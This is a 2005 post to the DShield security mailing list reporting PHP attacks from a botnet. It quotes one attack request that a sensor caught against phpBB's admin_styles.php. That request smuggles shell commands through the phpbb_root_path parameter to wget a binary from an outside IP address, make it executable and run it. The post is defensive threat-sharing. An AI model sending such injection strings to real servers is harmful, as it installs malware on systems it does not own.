[Dshield] PHP attacks (was Re:Destructive botnet originating from Japan]

Jeff Kell jeff-kell at utc.edu
Sat Dec 24 21:31:19 GMT 2005

Chris Brenton wrote:

>And the follow up that includes the point of infection. This was covered
>in the diary a few days ago.
Just spotted this on one of my sensors (obfuscated http: but otherwise 

>GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=h t t p://;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo|  HTTP/1.1

More information about the list mailing list